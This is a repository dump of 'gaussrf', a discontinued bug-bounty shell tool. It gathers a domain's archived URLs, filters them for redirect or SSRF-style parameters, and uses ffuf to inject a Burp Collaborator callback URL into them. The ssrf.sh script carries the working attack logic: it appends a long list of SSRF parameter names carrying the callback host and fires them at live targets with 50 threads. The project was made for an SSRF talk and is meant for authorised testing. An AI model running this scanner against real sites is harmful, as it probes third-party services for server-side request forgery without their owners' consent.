[ { "path": "README.md", "content": "# gaussrf\n**It is now discontinued project, and not been maintained**\n```\n\n\n____________________ __ ________________________________\n__ ____/__ |_ / / / __ ___/_ ___/__ __ \\__ ____/\n_ / __ __ /| | / / / _____ \\_____ \\__ /_/ /_ /_ \n/ /_/ / _ ___ / /_/ / ____/ /____/ /_ _, _/_ __/ \n\\____/ /_/ |_\\____/ /____/ /____/ /_/ |_| /_/ \n \n\n\n```\nFetch known URLs from AlienVault's Open Threat Exchange, the Wayback Machine, and Common Crawl and Filter Urls With OpenRedirection or SSRF Parameters. This Tool was built to present in Null Ahmedabad [Deep Dive into SSRF](https://null.co.in/event_sessions/3086-deep-dive-into-ssrf) you can get slides from the link.\n\n## Prerequisites\n\n* [GetAllUrls](https://github.com/lc/gau) - For Fetching Urls\n* [Assetfinder](https://github.com/tomnomnom/assetfinder) - For Subdomain Enumeration\n* [Drishti](https://github.com/devanshbatham/Drishti) - For check if url is live or not.\n\nYou can now use install.sh to install require tools, this tools where made in go it should be installed in your system and dont forget to set path of go properly.\n```bash\n$ sudo chmod +x install.sh\n$ ./install.sh\n```\n### Installation\n\n```bash\n$ git clone https://github.com/KathanP19/gaussrf.git\n$ cd gaussrf/\n$ sudo chmod +x ssrf.sh\n``` \n### Usage\nDont Forget to put your blind ssrf testing link or burp collab link in `burp.txt`\nor you can use thi site [SSRFTest](https://ssrftest.com/) if you dont have BurpPro\n\n```\n ____________________ __ ________________________________\n __ ____/__ |_ / / / __ ___/_ ___/__ __ \\__ ____/\n _ / __ __ /| | / / / _____ \\_____ \\__ /_/ /_ /_\n / /_/ / _ ___ / /_/ / ____/ /____/ /_ _, _/_ __/\n \\____/ /_/ |_\\____/ /____/ /____/ /_/ |_| /_/\n\n\n\n\nUsage: For Using directly where subdomains will be found using Assetfinder\n ./ssrf.sh -d domain.com\n ./ssrf.sh -d domain.com -o output_directory\n ./ssrf.sh -d domain.com -ap\n ./ssrf.sh -d domain.com -o output_directory -ap\n\nUsage: For Using list of Subdomains\n ./ssrf.sh -l subdomains.txt\n ./ssrf.sh -l subdomains.txt -o output_directory\n ./ssrf.sh -l subdomains.txt -ap\n ./ssrf.sh -l subdomains.txt -o output_directory -ap\n```\n```\nOptions are as follows \n -d for direct letting assetfinder handle subdomain part\n -l for using list of subdomains\n -o for declaring output directory\n -ap for using parameter appending feature\n```\n## Credits:\nThanks @tomnomom for [Assetfinder](https://github.com/tomnomnom)!\n\nThanks @devanshbatham for [Drishti](https://github.com/devanshbatham/Drishti)!\n\nThanks @lc for [GAU](https://github.com/lc/gau)!\n\nThanks @hussein98d for parameter appending feature.\n\n### TODO list\n\n~~Integrate [ffuf](https://github.com/ffuf/ffuf) to fuzz params with burp collab url.~~\n\n~~Add Option For User to Add there own subdoamin list.~~\n\n## Contributors\n[@iNoSec2](https://github.com/iNoSec2) for adding output option.\n" }, { "path": "burp.txt", "content": "http://[yourburpcollaburl]\n" }, { "path": "install.sh", "content": "#!/bin/bash\n\necho \"============================Installing Tools For GAUSSRF==========================\"\necho \" \"\n\n##Install Assetfinder\necho -e \"\\nINSTALLING \\e[31m[assetfinder]\\e[0m\"\ngo get -u github.com/tomnomnom/assetfinder\necho -e \"\\nINSTALLING ASSETFINDER \\e[32mFINISH\\e[0m\"\n\n##Install GAU\necho -e \"\\nINSTALLING \\e[31m[GAU]\\e[0m\"\ngo get -u github.com/lc/gau\necho -e \"\\nINSTALLING GAU \\e[32mFINISH\\e[0m\"\n\n##Installing Drishti\necho -e \"\\nINSTALLING \\e[31m[Drishti]\\e[0m\"\ngit clone https://github.com/devanshbatham/Drishti\ncd Drishti\npip3 install -r requirements.txt\nrm raw_urls.txt\ncd ..\necho -e \"\\nINSTALLING Drishti \\e[32mFINISH\\e[0m\"\n\n##Install qsreplace\necho -e \"\\nINSTALLING \\e[31m[QSreplace]\\e[0m\"\ngo get -u github.com/tomnomnom/qsreplace\necho -e \"\\nINSTALLING Qsreplace \\e[32mFINISH\\e[0m\"\n\n##Install ffuf\necho -e \"\\nINSTALLING \\e[31m[FFUF]\\e[0m\"\ngo get github.com/ffuf/ffuf\necho -e \"\\nINSTALLING FFUF \\e[32mFINISH\\e[0m\"\n\necho \"=============================Done Installing Tools=================================\"\n" }, { "path": "ssrf.sh", "content": "#!/bin/bash\n\nred=`tput setaf 1`\nreset=`tput sgr0`\n\nlogo(){\n echo \"${red}\n\n ____________________ __ ________________________________\n __ ____/__ |_ / / / __ ___/_ ___/__ __ \\__ ____/\n _ / __ __ /| | / / / _____ \\_____ \\__ /_/ /_ /_\n / /_/ / _ ___ / /_/ / ____/ /____/ /_ _, _/_ __/\n \\____/ /_/ |_\\____/ /____/ /____/ /_/ |_| /_/\n\n\n\n${reset}\"\n}\n\nsubs(){\nlogo\n##Getting SubDomains\necho -e \"\\nRUNNING \\e[31m[assetfinder]\\e[0m\"\nassetfinder --subs-only $domain > $output_directory/$domain/$domain.assetfinder.txt\ncat $output_directory/$domain/$domain.assetfinder.txt | sort -u > $output_directory/$domain/subs.txt\necho \"FOUND SUBDOMAINS [$(cat $output_directory/$domain/subs.txt | wc -l)]\"\necho -e \"RUNNING ASSETFINDER \\e[32mFINISH\\e[0m\"\n}\n\nlist(){\nlogo\necho \"Its the list of subdomains\"\ncp $param $output_directory/$domain/subs.txt\n}\n\nrecon(){\n##Starting GETALLURLS\necho -e \"\\nRUNNING \\e[31m[GAU]\\e[0m\"\ncat $output_directory/$domain/subs.txt | gau > $output_directory/$domain/$domain.urls.txt\necho -e \"RUNNING GAU \\e[32mFINISH\\e[0m\"\n\necho \"${red} ---------------COLLECTED URLS OF SUBDOMAINS--------------- ${reset}\"\n\n##Filter Urls to check with drishti\necho -e \"\\n\\e[31m[Filtering Urls with params]\\e[0m\"\ncat $output_directory/$domain/$domain.urls.txt | grep \"=http\" | tee $output_directory/$domain/$domain.urls_with_params.txt\necho -e \"Filtering Urls with params completed \\e[32mFINISH\\e[0m\"\n\n##Cleaning the list for urls\necho -e \"\\nChecking for Live Urls \\e[31m[LIST]\\e[0m\"\ncp $output_directory/$domain/$domain.urls_with_params.txt ./Drishti/\nmv ./Drishti/$domain.urls_with_params.txt ./Drishti/raw_urls.txt\ncd ./Drishti\npython3 drishti.py\ncd ..\ncp ./Drishti/Results-200.txt $output_directory/$domain/\nrm ./Drishti/raw_urls.txt\necho \"FOUND POSSIBLE SSRF URLS [$(cat $output_directory/$domain/Results-200.txt | wc -l)]\"\necho -e \"Checking for Live Urls \\e[32mFINISH\\e[0m\"\n\n##FUZZ\necho -e \"\\nHope You Have Added Burp Collab Url In burp.txt Fuzzing\\e[31m[LIST]\\e[0m\"\ncat $output_directory/$domain/Results-200.txt | qsreplace FUZZ > $output_directory/$domain/fuzzable.txt\nffuf -w \"$output_directory/$domain/fuzzable.txt:URL\" -w burp.txt -u URLFUZZ -v\necho \"${red} --------------DONE---------------- ${reset}\"\n}\nparam(){\necho -e \"\\n\\e[31m[Making List of Appened SSRF Params And Fire Them]\\e[0m\"\nser=`cat burp.txt`\ncat $output_directory/$domain/Results-200.txt | sort | uniq | grep \"?\" | qsreplace -a | qsreplace $ser > $output_directory/$domain/appended_params.txt\nsed -i \"s|$|\\&dest=$ser\\&redirect=$ser\\&uri=$ser\\&path=$ser\\&continue=$ser\\&url=$ser\\&window=$ser\\&next=$ser\\&data=$ser\\&reference=$ser\\&site=$ser\\&html=$ser\\&val=$ser\\&validate=$ser\\&domain=$ser\\&callback=$ser\\&return=$ser\\&page=$ser\\&feed=$ser\\&host=$ser&\\port=$ser\\&to=$ser\\&out=$ser\\&view=$ser\\&dir=$ser\\&show=$ser\\&navigation=$ser\\&open=$ser|g\" $output_directory/$domain/appended_params.txt\necho -e \"\\nTOTAL NUMBER OF URLS APPENED WITH PARAMS [$(cat $output_directory/$domain/appended_params.txt | wc -l)]\"\necho \"${red}-----------------------Check Your Server for Potential Callbacks------------------------- ${reset}\"\nffuf -w $output_directory/$domain/appended_params.txt -u FUZZ -t 50\necho \"${red} --------------DONE---------------- ${reset}\"\n}\n\nkillit(){\n logo\n echo \"Usage: For Using directly which will find domains using Assetfinder\"\n echo \" ./ssrf.sh -d domain.com\"\n echo \" ./ssrf.sh -d domain.com -o output_directory\"\n echo \" ./ssrf.sh -d domain.com -ap\"\n echo \" ./ssrf.sh -d domain.com -o output_directory -ap\"\n echo \" \"\n echo \"Usage: For Using list of Subdomains\"\n echo \" ./ssrf.sh -l subdomains.txt\"\n echo \" ./ssrf.sh -l subdomains.txt -o output_directory\"\n echo \" ./ssrf.sh -l subdomains.txt -ap\"\n echo \" ./ssrf.sh -l subdomains.txt -o output_directory -ap\"\n exit 1\n}\n\nif [ -z \"$1\" ];then\n killit\nelse\nwhile [ -n \"$1\" ]; do\n case \"$1\" in\n -d) domain=\"$2\"\n if [[ $3 == '-o' && $5 == \"-ap\" ]];then\n output_directory=\"$4/gaussrf/recon/\"\n mkdir -p \"$output_directory\"/\"$domain\"\n subs $domain\n recon $domain\n param $domain\n elif [[ $3 == \"-o\" ]]\n then\n output_directory=\"$4/gaussrf/recon/\"\n mkdir -p \"$output_directory\"/\"$domain\"\n subs $domain\n recon $domain\n elif [[ $3 == \"-ap\" ]]\n then\n output_directory=\"recon\"\n mkdir -p \"$output_directory\"/\"$domain\"\n subs $domain\n recon $domain\n param $domain\n else\n output_directory=\"recon\"\n mkdir -p \"$output_directory\"/\"$domain\"\n subs $domain\n recon $domain\n fi\n shift\n break\n ;;\n -l) param=\"$2\"\n echo -n \"What's is your target name : \"\n read domain\n if [[ $3 == '-o' && $5 == \"-ap\" ]];then\n output_directory=\"$4/gaussrf/recon/\"\n mkdir -p \"$output_directory\"/\"$domain\"\n list\n recon $domain\n param $domain\n elif [[ $3 == \"-o\" ]]\n then\n output_directory=\"$4/gaussrf/recon/\"\n mkdir -p \"$output_directory\"/\"$domain\"\n list\n recon $domain\n elif [[ $3 == \"-ap\" ]]\n then\n output_directory=\"recon\"\n mkdir -p \"$output_directory\"/\"$domain\"\n list\n recon $domain\n param $domain\n else\n output_directory=\"recon\"\n mkdir -p \"$output_directory\"/\"$domain\"\n list\n recon $domain\n fi\n shift\n break\n ;;\n *) echo \"Option $1 not recongnized\" ;;\n esac\n shift\ndone\nfi\n" } ]